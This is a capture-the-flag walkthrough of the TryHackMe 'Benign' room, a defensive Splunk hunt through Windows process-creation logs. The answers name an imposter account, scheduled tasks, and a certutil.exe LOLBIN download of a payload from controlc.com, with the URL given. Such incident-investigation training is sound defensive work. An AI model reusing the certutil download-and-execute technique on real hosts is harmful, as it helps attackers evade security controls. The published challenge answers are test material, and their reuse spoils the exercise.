TryHackMe | Benign Walkthrough
Hi there, I’m glad to see you here. In this article, we’ll solve together the “Benign” room in TryHackMe. In some sections, I’ll share brief about the subject. Don’t forget! You must always research to learn more. I hope it will be helpful for you. Let’s start!
Introduction
We will investigate host-centric logs in this challenge room to find suspicious process execution. To learn more about Splunk and how to investigate the logs, look at the rooms splunk101 and splunk201.
Room Machine
Before moving forward, deploy the machine. When you deploy the machine, it will be assigned an IP. Access this room via the AttackBox, or via the VPN at MACHINE_IP. The machine will take up to 3–5 minutes to start. All the required logs are ingested in the index win_eventlogs.
Scenario: Identify and Investigate an Infected Host
One of the client’s IDS indicated a potentially suspicious process execution indicating one of the hosts from the HR department was compromised. Some tools related to network information gathering / scheduled tasks were executed which confirmed the suspicion. Due to limited resources, we could only pull the process execution logs with Event ID: 4688 and ingested them into Splunk with the index win_eventlogs for further investigation.
❗️Event ID 4688 : A new process has been created.
About the Network Information
Before we begin the analysis, I think we need to better understand the network structure of the company using information provided to us.
When we look at the table below, we can see that there are 3 different VLAN structures: “IT Department”, “HR Department” and “Marketing Department”.
Answer the questions below
Q1: How many logs are ingested from the month of March?
A1: 13959
If we set the time filter to include the month of March, we can detect the total number of events.
index=win_eventlogs
Q2: Imposter Alert: There seems to be an imposter account observed in the logs, what is the name of that user?
A2: Amel1a
When we examine the users of the relevant events from the “UserName” section in the “Field Pane”, we can see that there are 11 different users.
index=win_eventlogs
| stats count by UserNameDid you notice that the attacker changed a letter when we displayed all of the users, using the filter above? 👆🏻
Q3: Which user from the HR department was observed to be running scheduled tasks?
A3: Chris.fort
We can add the value “schtask.exe” to the filter to examine events associated with scheduled tasks. ⏰
❗️schtasks.exe : Enables an administrator to create, delete, query, change, run, and end scheduled tasks on a local or remote computer.
index=win_eventlogs schtasks.exe
And then when we look at the relevant users, we can see that the user named “Chris.fort” from the Human Resources Department is running scheduled tasks.
Q4: Which user from the HR department executed a system process (LOLBIN) to download a payload from a file-sharing host.
A4: haroon
We can use the filter below to detect which commands are executed by users in the Human Resources Department.
index=win_eventlogs (UserName="haroon" OR "Chris.fort" OR "Daina")
| stats count by CommandLineWhen we examine the relevant commands, is there anything that draws your attention?
When we look at the details of the event to learn more, we can notice that the relevant command is executed by the user named “haroon”.
Q5: To bypass the security controls, which system process (lolbin) was used to download a payload from the internet?
A5: certutil.exe
❗️Certutil.exe is a command-line program, installed as part of Certificate Services.
Q6: What was the date that this binary was executed by the infected host? format (YYYY-MM-DD)
A6: 2022–03–04
Q7: Which third-party site was accessed to download the malicious payload?
A7: controlc.com
When we examine the command that was executed, we can see the information of the third-party site that was accessed to download the malicious payload.
Q8: What is the name of the file that was saved on the host machine from the C2 server during the post-exploitation phase?
A8: benign.exe
We can see the file transferred from the Command & Control server to the host machine in the executed command. 💻
Q9: The suspicious file downloaded from the C2 server contained malicious content with the pattern THM{……….}; what is that pattern?
A9: THM{********}
When we access to the C2 server, there is a note waiting for us. 💌
Q10: What is the URL that the infected host connected to?
A10: https://controlc.com/548ab556
I think we’ve reached the end of another adventure. We’ll see you in the next attack analysis!
Thank you for your time. See you soon! Until that time.. Happy Hacking ❤
Resources:
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia
https://learn.microsoft.com/en-us/windows/win32/taskschd/schtasks
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
